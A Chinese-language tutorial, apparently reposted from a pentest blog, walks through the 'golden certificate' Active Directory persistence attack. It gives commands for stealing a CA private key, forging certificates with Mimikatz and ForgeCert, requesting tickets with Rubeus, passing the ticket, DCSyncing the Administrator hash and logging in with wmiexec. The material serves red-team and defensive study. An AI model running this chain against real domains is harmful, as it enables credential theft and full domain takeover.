<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    利用黃金證書劫持域控

    VSole2021-11-25 10:25:32

    域控滲透最常見的域持久性技術之一是黃金票據攻擊,它涉及使用“ krbtgt ”的 NTLM 哈希創建 kerberos 票證。但是在部署了 Active Directory 認證服務 (AD CS) 的服務器的域中,可能會在發生入侵時被濫用以實現域持久性。通過竊取 CA 證書的私鑰,紅隊可以偽造和簽署證書以用于身份驗證。在部署 Active Directory 證書服務 (AD CS) 期間,域中默認啟用基于證書的身份驗證。因此,需要將這些系統視為第 0 層資產并得到適當保護。

    通過黃金證書執行域持久化需要以下步驟:

    1. 證書提取 (CA)
    2. 偽造CA證書
    3. 獲取 Kerberos 票證(DC 的機器賬戶)
    4. 執行pass票證

    證書提取

    CA 證書和私鑰存儲在 CA 服務器中。使用與系統的 RDP 連接,可以使用“ certsrv.msc ”的備份功能檢索這些信息。

    certsrv – 備份 CA

    在證書頒發機構備份向導中,私鑰和 CA 證書都可以導出到指定位置。

    certsrv – 私鑰和備份位置

    CA 證書將導出為 p12 文件(個人信息交換)。

    certsrv – 提取的 CA

    但是,還有多種其他方法可用于從服務器提取 CA 證書和私鑰。使用參數“ Certificates ”執行Seatbelt可以枚舉存儲的CA證書。

    Seatbelt.exe Certificates
    

    Seatbelt – 本地機器

    Mimikatz 還可以與加密存儲進行交互,以檢索和導出證書和私鑰。修補“ CryptoAPI ”和“ KeyIso ”不可導出的密鑰將可以從許多密鑰提供程序導出。

    privilege::debug
    crypto::capi
    crypto::cng
    crypto::certificates /systemstore:local_machine /store:my /export
    

    Mimikatz – 導出證書

    Mimikatz - CA 證書

    證書將以 .DER 和 .PFX 格式提取到磁盤上。

    SharpDPAPI也可用于提取證書。執行“ certificates /machine ”命令將使用機器證書存儲來提取可解密的機器證書和私鑰。

    SharpDPAPI.exe certificates /machine
    

    SharpDPAPI – 機器證書

    私鑰和證書都將顯示在控制臺中。

    SharpDPAPI - CA 證書

    提取的私鑰和證書可以寫入擴展名為 .PEM 的文件中。執行以下命令可以將證書轉換為可用格式,如 .PFX 允許用于使用 Rubeus 進行身份驗證。

    openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
    

    將證書轉換為 PFX

    偽造CA證書

    Mimikatz 可用于通過使用“ crypto::scauth ”模塊來偽造和簽署證書。該模塊最初是為創建智能卡身份驗證客戶端證書而開發的。所需的參數是證書頒發機構的主題名稱和將創建證書的用戶的用戶主體名稱。可選項,“ /pfx ”參數可用于定義將要創建的證書的文件名。

    crypto::scauth /caname:ca /upn:pentestlab@purple.lab
    

    偽造CA證書——Mimikatz

    或者,ForgeCert是由Lee Christensen在 C# 中開發的,它使紅隊能夠使用 CA 證書為任何域用戶偽造證書進行身份驗證。該工具可以注入內存中執行,并將文件寫入磁盤。執行以下命令將為“ pentestlab ”用戶創建一個假證書,該證書將由 CA 證書的私鑰簽名。

    ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword Password123 --Subject CN=User --SubjectAltName pentestlab@purple.lab --NewCertPath localadmin.pfx --NewCertPassword Password123
    

    偽造CA證書-域用戶

    應該注意的是,必須為域上的活動用戶創建證書。因此它不能用于“ krbtgt ”帳戶。偽造證書的有效期為1年,只要CA證書有效(一般為5年)就有效。除了域用戶帳戶外,機器帳戶也可用于域持久性,因為可以使用 DCSync、Pass the Ticket 和 S4U2Self 等技術。

    ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword Password123 --Subject CN=User --SubjectAltName DC$@purple.lab --NewCertPath DC$.pfx --NewCertPassword Password123
    

    偽造證書-機臺賬

    Kerberos 票證

    可以使用偽造的證書從密鑰分發中心 (KDC) 請求 Kerberos 票證以進行身份驗證。

    Rubeus.exe asktgt /user:pentestlab /certificate:localadmin.pfx /password:Password123
    

    Rubeus – Kerberos 票證

    Rubeus - 域用戶票

    通過票證

    可以從域中的任何主機使用屬于域控制器的機器帳戶的證書來請求 Kerberos 票證。執行以下命令將檢索 base64 格式的票證。

    Rubeus.exe asktgt /user:DC$ /certificate:DC$.pfx /password:Password123
    

    Rubeus - 請求 DC 機器帳戶的票證

    DC 機器帳戶 Base64 票證

    base64 票證可以被解碼并寫入擴展名為 .kirbi 的文件中。

    echo "" | base64 -d > dc$.kirbi
    

    將 Base64 票證轉換為 Kirby

    票證可以傳輸到任何 Windows 主機,并使用傳遞票證技術導入任何用戶會話。

    Rubeus.exe ptt /ticket:dc$.kirbi
    

    Rubus – 通過票證

    由于票據屬于域控制器的計算機帳戶,因此可以執行提升的活動,例如 DCSync。從當前執行 Mimikatz 并運行以下命令的會話中,將檢索作為域管理員帳戶的用戶 Administrator 的 NTLM 哈希。

    lsadump::dcsync /user:Administrator
    

    Mimikatz – DCSync

    散列可用于通過散列技術或通過 WMI 連接建立對域控制器的訪問。

    python3 wmiexec.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71 Administrator@10.0.0.1
    

    WMI 連接 - 域控制器

    參考鏈接

    https://github.com/GhostPack/Seatbelt

    https://github.com/GhostPack/SharpDPAPI

    https://github.com/GhostPack/ForgeCert

    https://pentestlab.blog/2021/11/15/golden-certificate/



    ca中心ca證書
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    VPN:IKE密鑰交換原理
    2021-10-02 12:50:17
    在采用IKE動態協商方式建立IPSec隧道時,SA有兩種:一種IKE SA,另一種是IPSec SA。建立IKE SA目的是為了協商用于保護IPSec隧道的一組安全參數,建立IPSec SA的目的是為了協商用于保護用戶數據的安全參數,但在IKE動態協商方式中,IKE SA是IPSec SA的基礎,因為IPSec SA的建立需要用到IKE SA建立后的一系列密鑰。本文介紹在IKE動態協商方式建立IP
    起源于比特幣[1]的區塊鏈技術作為繼互聯網之后計算存儲模式的又一次顛覆式創新,通過其獨特的塊鏈式數據結構,多方維護的共識算法及靈活編程的智能合約,構建了一種新型的分布式信任網絡,有力的推動了互聯網技術由信息互聯網向價值互聯網的轉化。 然而,區塊鏈系統在提供靈活分布式協作優勢的同時,其自身身份管理也面臨著極大挑戰。在傳統中心化交易系統中,參與方的身份管理及交易數據均由中心機構統一核驗確認,且相關信
    信息技術飛速發展,在不斷改變人們生產生活方式的同時,也帶來了日益嚴峻的網絡安全問題。如何在網絡實體間建立信任關系,是信息安全領域需要解決的重點問題。作為網絡安全的基石,網絡信任體系衍生出公鑰基礎設施、標識密碼等多種技術。當前,區塊鏈技術以不可篡改、不可偽造、可追溯等特點備受各界關注,在金融、政務、司法等領域廣泛應用,也為網絡信任體系的構建提供了新的思路。
    區塊鏈是近年來出現了一項分布式共識技術,基于區塊鏈共識協議結合智能合約技術可實現去中心化的數據共享。隱私保護是數據共享中的關鍵特性,原生區塊鏈沒有解決隱私保護問 題。利用數字摘要匹配算法提出了一種數據共享協議,該協議通過數字摘要空間的信息匹配,可在保護數據隱私的情況下實現數據的受控共享。基于協議的運行邏輯,分析了協議執行的正確性,參與雙方可實現數據交換共享。針對數據共享中的面臨的安全威脅,給出了安
    SSH的使用詳解
    2022-04-19 07:24:57
    今天為大家分享一篇關于SSH 的介紹和使用方法的文章。本文從SSH是什么出發,講述了SSH的基本用法,之后在遠程登錄、端口轉發等多種場景下進行獨立的講述,希望能對大家有所幫助。
    系統安全第31篇文章介紹惡意代碼攻擊溯源基礎知識
    域控滲透最常見的域持久性技術之一是黃金票據攻擊,它涉及使用“ krbtgt ”的 NTLM 哈希創建 kerberos 票證。但是在部署了 Active Directory 認證服務的服務器的域中,可能會在發生入侵時被濫用以實現域持久性。
    上一季度威脅趨勢的分析結果表明,攻擊者增加了無文件惡意軟件的使用,而所有檢出惡意軟件中近三分之二是零日惡意軟件。 企業如果尚未實現控制措施檢測藏身于加密網絡流量中的惡意軟件,就會面臨環境中廣泛分布大量惡意工具,自身端點設備可能遭受攻擊的風險。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类